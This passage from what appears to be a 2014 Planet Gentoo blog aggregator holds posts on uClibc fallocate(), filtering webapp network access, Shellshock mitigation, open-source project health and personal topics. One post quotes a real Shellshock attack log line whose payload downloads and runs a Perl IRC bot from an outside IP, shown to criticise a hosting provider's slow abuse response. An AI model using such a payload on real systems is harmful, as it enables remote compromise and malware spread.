 * fallocate64() - Manipulate file space.
 *
 * @fd: defrag target file's descriptor.
 * @mode: process flag.
 * @offset: file offset.
 * @len: file size.
 */
static int fallocate64(int fd, int mode, loff_t offset, loff_t len)
{
    return syscall(__NR_fallocate, fd, mode, offset, len);
}
#endif /* ! HAVE_FALLOCATE */

The idea was that, if a configure test for fallocate64() failed because it isn’t available in your libc, but there is a system call for it in the kernel, then e4defrag would just make the syscall via your libc’s indirect syscall() function.  Seems simple enough, except that how system calls are dispatched is architecture and ABI dependant and the above is broken on 32-bit systems [8].  Of course, uClibc didn’t have fallocate() so e4defrag failed to build after that commit.  To my surprise, musl does have fallocate() so this wasn’t a problem there, even though it is a Linux specific function and not in any standard.

My first approach was to patch e2fsprogs to use posix_fallocate() which is supposed to be equivalent to fallocate() when invoked with mode = 0.  e4defrag calls fallocate() in mode = 0, so this seemed like a simple fix.  However, this was not acceptable to Ts’o since he was worried that some libc might implement posix_fallocate() by brute force writing 0′s.  That could be horribly slow for large allocations!  This wasn’t the case for uClibc’s implementation but that didn’t seem to make much difference upstream.  Meh.

Rather than fight e2fsprogs, I sat down and hacked fallocate() into uClibc.  Since both fallocate() and posix_fallocate(), and their LFS counterparts fallocate64() and posix_fallocate64(), make the same syscall, it was sufficient to isolate that in an internal function which both could make use of.  That, plus a test suite, and Bernhard was kind enough to commit it to master [10].  Then a couple of backports, and uClibc’s 0.9.33 branch now has the fix as well.  Because there hasn’t been a release of  uClibc in about two years, I’m using the 0.9.33 branch HEAD for Lilblue, so the problem there was solved — I know its a little problematic, but it was either that or try to juggle dozens of patches.

The only thing that remains is to backport those fixes to vapier’s patchset that he maintains for the uClibc ebuilds.  Since my uClibc stage3′s don’t use the 0.9.33 branch head, but the stable tree ebuilds which use the vanilla 0.9.33.2 release plus Mike’s patchset, upgrading e2fsprogs is blocked for those stages.

This whole process may seem like a real pita, but this is exactly the sort of issues I like uncovering and cleaning up.  So far, the feedback on the latest release is good.  If you want to play with Lilblue and you don’t have a free box, fire up VirtualBox or your emulator of choice and give it a try.  You can download it from the experimental/amd64/uclibc off any mirror [11].

October 03, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Does your webapp really need network access? (October 03, 2014, 23:01 UTC)

One of the interesting thing that I noticed after shellshock was the amount of probes for vulnerabilities that counted on webapp users to have direct network access. Not only ping to known addresses to just verify the vulnerability, or wget or curl with unique IDs, but even very rough nc or even /dev/tcp connections to give remote shells. The fact that probes are there makes it logical to me to expect that for at least some of the systems these actually worked.

The reason why this piqued my interest is because I realized that most people don't do the one obvious step to mitigate this kind of problems by removing (or at least limiting) the access to the network of their web apps. So I decided it might be a worth idea to describe a moment why you should think of that. This is in part because I found out last year at LISA that not all sysadmins have enough training in development to immediately pick up how things work, and in part because I know that even if you're a programmer it might be counterintuitive for you to think that web apps should not have access, well, to the web.

Indeed, if you think of your app in the abstract, it has to have access to the network to serve the response to the users, right? But what happens generally is that you have some division between the web server and the app itself. People who have looked into Java in the early nougthies probably have heard of the term Application Server, which usually is present in form of Apache Tomcat or IBM WebSphere, but here is essentially the same "actor" for Rails app in the form of Passenger, or for PHP with the php-fpm service. These "servers" are effectively self-contained environments for your app, that talk with the web server to receive user requests and serve them responses. This essentially mean that in the basic web interaction, there is no network access needed for the application service.

Things gets a bit more complicated in the Web 2.0 era though: OAuth2 requires your web app to talk, from the backend, with the authentication or data providers. Similarly even my blog needs to talk with some services, to either ping them to tell them that a new post is out, and to check with Akismet for blog comments that might or might not be spam. WordPress plugins that create thumbnails are known to exist and to have a bad history of security and they fetch external content, such as videos from YouTube and Vimeo, or images from Flickr and other hosting websites to process. So there is a good amount of network connectivity needed for web apps too. Which means that rather than just isolating apps from the network, what you need to implement is some sort of filter.

Now, there are plenty of ways to remove access to the network from your webapp: SElinux, GrSec RBAC, AppArmor, … but if you don't want to set up a complex security system, you can do the trick even with the bare minimum of the Linux kernel, iptables and CONFIG_NETFILTER_XT_MATCH_OWNER. Essentially what this allows you to do is to match (and thus filter) connections based of the originating (or destination) user. This of course only works if you can isolate your webapps on a separate user, which is definitely what you should do, but not necessarily what people are doing. Especially with things like mod_perl or mod_php, separating webapps in users is difficult – they run in-process with the webserver, and negate the split with the application server – but at least php-fpm and Passenger allow for that quite easily. Running as separate users, by the way, has many more advantages than just network filtering, so start doing that now, no matter what.

Now depending on what webapp you have in front of you, you have different ways to achieve a near-perfect setup. In my case I have a few different applications running across my servers. My blog, a WordPress blog of a customer, phpMyAdmin for that database, and finally a webapp for an old customer which is essentially an ERP. These have different requirements so I'll start from the one that has the lowest.

The ERP app was designed to be as simple as possible: it's a basic Rails app that uses PostgreSQL to store data. The authentication is done by Apache via HTTP Basic Auth over HTTPS (no plaintext), so there is no OAuth2 or other backend interaction. The only expected connection is to the PostgreSQL server. Pretty similar the requirements for phpMyAdmin: it only has to interface with Apache and with the MySQL service it administers, and the authentication is also done on the HTTP side (also encrypted). For both these apps, your network policy is quite obvious: negate any outside connectivity. This becomes a matter of iptables -A OUTPUT -o eth0 -m owner --uid-owner phpmyadmin -j REJECT — and the same for the other user.

The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly is also HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better. You can put a proxy on your localhost, and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp to never connect directly to the web. Unfortunately that is not straight forward to implement as neither Passenger not php-fpm has a clean way to pass environment variables per users.

What I've done is for now is to hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still out for a solution for PHP unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it'll make two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll be soon shutting down both implementations since I really don't need it. Indeed the Publify development still seems to go toward the "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect me to go back to it any time soon.

Anthony Basile a.k.a. blueness (homepage, bugs)

Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been update in about 10 years and there were dozens of accumulated patches on the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done” whatever that meant, so I was going to tree clean it.  I expressed my intentions on the upstream mailing list when I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patch.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mail list going [3], and set up bugzilla [4].  There hasn’t been much activity but there was enough because it got noticed by someone who pushed it out in OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com>  from OpenSUSE fixed a possible DOS triggered by specially crafted .htpasswd. Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed makes it perfect for embedded systems which are near and dear to my heart.  I also make sure it compiles on *BSD and Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.

Hanno Böck a.k.a. hanno (homepage, bugs)
New laptop Lenovo Thinkpad X1 Carbon 20A7 (October 03, 2014, 21:05 UTC)

Thinkpad X1 CarbonWhile I got along well with my Thinkpad T61 laptop, for quite some time I had the plan to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant which is very different from the first one was released early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems rarely shops keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys, instead it has what Lenovo calls an adaptive keyboard: A touch sensitive line which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting them display the normal F-keys works well and not having "real" keys there doesn't feel like a big disadvantage. Beside that Lenovo removed the Caps lock and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it's used to be (small downside), but the </>/| key is where it belongs(big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to ultrabook / integrated design easy changing battery, ram or HD
* No SD card reader
* Have some trouble getting used to the touchpad (however there are lots of possibilities to configure it, I assume by playing with it that'll get better)

It used to be the case that people wrote docs how to get all the hardware in a laptop running on Linux which I did my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernels and xorg packages and most things will be fine". However I thought having a central place where I collect relevant information would be nice so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.

September 30, 2014
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
A little positivity goes a long way (September 30, 2014, 02:59 UTC)

Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken back by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach

September 28, 2014
Hanno Böck a.k.a. hanno (homepage, bugs)
Responsibility in running Internet infrastructure (September 28, 2014, 23:31 UTC)

If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.

On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.

Sebastian Pipping a.k.a. sping (homepage, bugs)
Unblocking F-keys (e.g. F9 for htop) in Guake 0.5.0 (September 28, 2014, 18:36 UTC)

I noticed that I couldn’t kill a process in htop today, F9 did not seem to be working, actualy most of the F-keys did not.

The reason turnout out to be that Guake 0.5.0 takes over keys F1 to F10 for direct access to tabs 1 to 10.
That may work for most terminal applications, but for htop it’s a killer.

So how can I prevent Guake from taking F9 over?
The preferences dialog allows me to assign a different key, but not no key. Really? There is no context menu, backspace and delete didn’t help. For now I assume it’s not possible.
So I fire up the gconf-editor, menu > Edit > Find… > “guake” — there it is. However, upon “Edit key…” gconf-editor says to me:

Currently pairs and schemas can’t be edited. This will be changed in a later version.

Very nice.

In the end what did work was to run

gconftool-2 --set /schemas/apps/guake/keybindings/local/switch_tab9 \
	--type string ''

and to restart Guake.

I just opened a bug for this. If you like, you can follow it at https://github.com/Guake/guake/issues/376 .

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
What does #shellshock mean for Gentoo? (September 28, 2014, 10:56 UTC)

Gentoo Penguins with chicks at Jougla Point, Antarctica
Photo credit: Liam Quinn

This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid this repeats. And that's a difficult topic, because a 25 years old bug is not easy to avoid, especially because there are probably plenty of siblings of it around, that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this to either happen or at least avoid that they escalate so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I've pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one I find very much good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is half unsolved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to use dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash

That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately as I said it's mostly safe. I even found that some of the init scripts I wrote, that I checked with checkbashisms did not work as intended with dash, fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, I found out when it broke my Puppet setup.

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it only has one reference implementation, but it also seem to convince other people, new to coding, that it's a good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25 years old bug is enough to think twice about all of them, o I'll keep my options open.

This is actually why I like software biodiversity: it allows to have options to select different options when one components fail, and that is what worries me the most with systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a proper librarised implementation. But that's probably hoping too much.

September 27, 2014
Anthony Basile a.k.a. blueness (homepage, bugs)
Tor-ramdisk 20140925 released (September 27, 2014, 16:35 UTC)

I’ve been blogging about my non-Gentoo work using my drupal site at http://opensource.dyc.edu/  but since I may be loosing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released 0.2.4.24 with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download: http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download: http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads

 

September 26, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)

Living on Credit Cards
Photo credit: Images_of_Money

Almost exactly 18 months after moving to Ireland I'm finally bound to receive my first Irish credit card. This took longer than I was expecting but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better start from the top.

First of all, I have already credit cards, Italian ones that as I wrote before, they are not chip'n'pin which causes a major headache in countries such as Ireland (but UK too), where non-chip'n'pin capable cards are not really well supported or understood. This means that they are not viable, even though I have been using them for years and I have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

But the question becomes why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks where they expect that your average does not go below a certain amount, it does not matter if one day you have no money and the next you have €10k on it: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use it more, but very few merchants allowed that, and the €15 limit on its use made it quite impractical to pay most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

Operations on most credit cards are on the other hand free; there are sometimes charges for "oversea usage" (foreign transactions), and you are charged interests if you don't pay the full amount of the debt at the end of the month, but you don't pay a fixed charge per operation. What you do pay here in Ireland is stamp duty, which is €30/year. A whole lot more than Italy where it was €1.81 until they dropped it on the floor. So my requirements on a credit card are to essentially hide as much as possible these costs. Which essentially mean that just getting a standard AIB card is not going to be very useful: yes I would be saving money after the first 150 operations, but I would be saving more to save enough to keep those €2.5k in the bank.

My planned end games were two: a Tesco credit card and an American Express Platinum, for very different reasons. I was finally able to get the former, but the latter is definitely out of my reach, as I'll explain later.

The Tesco credit card is a very simple option: you get 0.5% "pointback", as you get 1 Clubcard point every €2 spent. Since for each point you get a €.01 discount at end of quarter, it's almost like a cashback, as long as you buy your groceries from Tesco (that I do, because it's handy to have the delivery rather than having to go out for that, especially for things that are frozen or that weight a bit). Given that it starts with (I'm told) a puny limit of €750, maxing it out every month is enough to get back the stamp duty price with just the cashback, but it becomes even easier by using it for all the small operations such as dinner, Tesco orders, online charges, mobile phone, …

Getting the Tesco credit card has not been straightforward either. I tried applying a few months after arriving in Ireland, and I was rejected, as I did not have any credit history at all. I tried again earlier this year, adding a raise at work, and the results have been positive. Unfortunately that's only step one: the following steps require you to provide them with three pieces of documentation: something that ensures you're in control of the bank account, a proof of address, and a proof of identity.

The first is kinda obvious: a recent enough bank statement is good, and so is the second, a phone or utility bill — the problem starts when you notice that they ask you for an original and not a copy "from the Internet". This does not work easily given that I explicitly made sure all my services are paperless, so neither the bank nor the phone company sends me paper any more — the bank was the hardest to convince, for over an year they kept sending me a paper letter for every single wire I received with the exception of my pay, which included money coming from colleagues when I acted as a payment hub, PayPal transfer for verification purposes and Amazon KDP revenue, one per country! Luckily, they accepted a color printed copy of both.

Getting a proper ID certified was, though, much more complex. The only document I could use was my passport, as I don't have a driving license or any other Irish ID. I made a proper copy of it, in color, and brought it to my doctor for certification, he stamped and dated and declared, but it was not okay. I brought it to An Post – the Irish postal service – and told them that Tesco wanted a specific declaration on it, and to see the letter they sent me; they refused and just stamped it. I then went to the Garda – the Irish police – and I repeated Tesco's request; not only they refused to comply, but they told me that they are not allowed to do what Tesco was asking me to make them do, and instead they authenticated a declaration of mine that the passport copy was original and made by me.

What worked, at the end, was to go to a bank branch – didn't have to be the branch I'm enrolled with – and have them stamp the passport for me. Tesco didn't care it was a different branch and they didn't know me, it was still my bank and they accepted it. Of course since it took a few months for me to go through all these tries, by the time they accepted my passport, I needed to send them another proof of address, but that was easy. After that I finally got the full contract to sign and I'm now only awaiting the actual plastic card.

But as I said my aim was also for an American Express Platinum card. This is a more interesting case study: the card is far from free, as it starts with a yearly fee of €550, which is what makes it a bit of a status symbol. On the other hand, it comes with two features: their rewards program, and the perks of Platinum. The perks are not all useful to me, having Hertz Gold is not useful if you don't drive, and I already have comprehensive travel insurance. I also have (almost) platinum status with IHG so I don't need a card to get the usual free upgrades if available. The good part about them, though, is that you can bless a second Platinum card that gets the same advantages, to "friends or family" — in my case, the target would have been my brother in law, as he and my sister love to travel and do rent cars.

It also gives you the option of sending four more cards also to friends and family, and in particular I wanted to have one sent to my mother, so that she can have a way to pay for things and debit them to me so I can help her out. Of course as I said it has a cost, and a hefty one. Ont he other hand, it allows you one more trick: you can pay for the membership fee through the same rewards program they sign you up for. I don't remember how much you have to spend in an year to pay for it, but I'm sure I could have managed to get most of the fee waived.

Unfortunately what happens is that American Express requires, in Ireland, a "bank guarantee" — which according to colleagues means your bank should be taking on the onus of paying for the first €15k debt I would incur and wouldn't be able to repay. Something like this is not going to fly in Ireland, not only because of the problem with loans after the crisis but also because none of the banks will give you that guarantee today. Essentially American Express is making it impossible for any Irish resident to get a card from them, and this, again according to colleagues, extends to cardholders in other countries moving into Ireland.

The end result is that I'm now stuck with having only one (Visa) credit card in Ireland, which had feeble, laughable rewards program, but at least I have it, and it should be able to repay itself. I'm up to find a MasterCard card I can have to hedge my bets on the acceptance of the card – turns out that Visa is not well received in the Netherlands and in Germany – and that can repay itself for the stamp duty.

Tech media has been all the rage this year with trying to hype everything out there as the end of the Internet of Things or the nail on the coffin of open source. A bunch of opinion pieces I found also tried to imply that open source software is to blame, forgetting that the only reason why the security issues found had been considered so nasty is because we know they are widely used.

First there was Heartbleed with its discoverers deciding to spend time setting up a cool name and logo and website for, rather than ensuring it would be patched before it became widely known. Months later, LastPass still tells me that some of the websites I have passwords on have not changed their certificate. This spawned some interest around OpenSSL at least, including the OpenBSD fork which I'm still not sure is going to stick around or not.

Just few weeks ago a dump of passwords caused major stir as some online news sources kept insisting that Google had been hacked. Similarly, people have been insisting for the longest time that it was only Apple's fault if the photos of a bunch of celebrities were stolen and published on a bunch of sites — and will probably never be expunged from the Internet's collective conscience.

And then there is the whole hysteria about shellshock which I already dug into. What I promised on that post is looking at the problem from the angle of the project health.

With the term project health I'm referring to a whole set of issues around an open source software project. It's something that becomes second nature for a distribution packager/developer, but is not obvious to many, especially because it is not easy to quantify. It's not a function of the number of commits or committers, the number of mailing lists or the traffic in them. It's an aura.

That OpenSSL's project health was terrible was no mystery to anybody. The code base in particular was terribly complicated and cater for corner cases that stopped being relevant years ago, and the LibreSSL developers have found plenty of reasons to be worried. But the fact that the codebase was in such a state, and that the developers don't care to follow what the distributors do, or review patches properly, was not a surprise. You just need to be reminded of the Debian SSL debacle which dates back to 2008.

In the case of bash, the situation is a bit more complex. The shell is a base component of all GNU systems, and is FSF's choice of UNIX shell. The fact that the man page states clearly It's too big and too slow. should tip people off but it doesn't. And it's not just a matter of extending the POSIX shell syntax with enough sugar that people take it for a programming language and start using them — but that's also a big problem that caused this particular issue.

The health of bash was not considered good by anybody involved with it on a distribution level. It certainly was not considered good for me, as I moved to zsh years and years ago, and I have been working for over five years years on getting rid of bashisms in scripts. Indeed, I have been pushing, with Roy and others, for the init scripts in Gentoo to be made completely POSIX shell compatible so that they can run with dash or with busybox — even before I was paid to do so for one of the devices I worked on.

Nowadays, the point is probably moot for many people. I think this is the most obvious positive PR for systemd I can think of: no thinking of shells any more, for the most part. Of course it's not strictly true, but it does solve most of the problems with bashisms in init scripts. And it should solve the problem of using bash as a programming language, except it doesn't always, but that's a topic for a different post.

But why were distributors, and Gentoo devs, so wary about bash, way before this happened? The answer is complicated. While bash is a GNU project and the GNU project is the poster child for Free Software, its management has always been sketchy. There is a single developer – The Maintainer as the GNU website calls him, Chet Ramey – and the sole point of contact for him are the mailing lists. The code is released in dumps: a release tarball on the minor version, then every time a new micro version is to be released, a new patch is posted and distributed. If you're a Gentoo user, you can notice this as when emerging bash, you'll see all the patches being applied one on top of the other.

There is no public SCM — yes there is a GIT "repository", but it's essentially just an import of a given release tarball, and then each released patch applied on top of it as a commit. Since these patches represent a whole point release, and they may be fixing different bugs, related or not, it's definitely not as useful has having a repository with the intent clearly showing, so that you can figure out what is being done. Reviewing a proper commit-per-change repository is orders of magnitude easier than reviewing a diff in code dumps.

This is not completely unknown in the GNU sphere, glibc has had a terrible track record as well, and only recently, thanks to lots of combined efforts sanity is being restored. This also includes fixing a bunch of security vulnerabilities found or driven into the ground by my friend Tavis.

But this behaviour is essentially why people like me and other distribution developers have been unhappy with bash for years and years, not the particular vulnerability but the health of the project itself. I have been using zsh for years, even though I had not installed it on all my servers up to now (it's done now), and I have been pushing for Gentoo to move to /bin/sh being provided by dash for a while, at the same time Debian did it already, and the result is that the vulnerability for them is way less scary.

So yeah, I don't think it's happenstance that these issues are being found in projects that are not healthy. And it's not because they are open source, but rather because they are "open source" in a way that does not help. Yes, bash is open source, but it's not developed like many other projects in the open but behind closed doors, with only one single leader.

So remember this: be open in your open source project, it makes for better health. And try to get more people than you involved, and review publicly the patches that you're sent!

September 25, 2014
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Limiting the #shellshock fear (September 25, 2014, 20:11 UTC)

Today's news all over the place has to do with the nasty bash vulnerability that has been disclosed and now makes everybody go insane. But around this, there's more buzz than actual fire. The problem I think is that there are a number of claims around this vulnerability that are true all by themselves, but become hysteria when mashed together. Tip of the hat to SANS that tried to calm down the situation as well.

Yes, the bug is nasty, and yes the bug can lead to remote code execution; but not all the servers in the world are vulnerable. First of all, not all the UNIX systems out there use bash at all: the BSDs don't have bash installed by default, for instance, and both Debian and Ubuntu have been defaulting to dash for their default shell in years. This is important because the mere presence of bash does not make a system vulnerable. To be exploitable, on the server side, you need at least one of two things: a bash-based CGI script, or /bin/sh being bash. In the former case it becomes obvious: you pass down the CGI variables with the exploit and you have direct remote code execution. In the latter, things are a tad less obvious, and rely on the way system() is implemented in C and other languages: it invokes /bin/sh -c {thestring}.

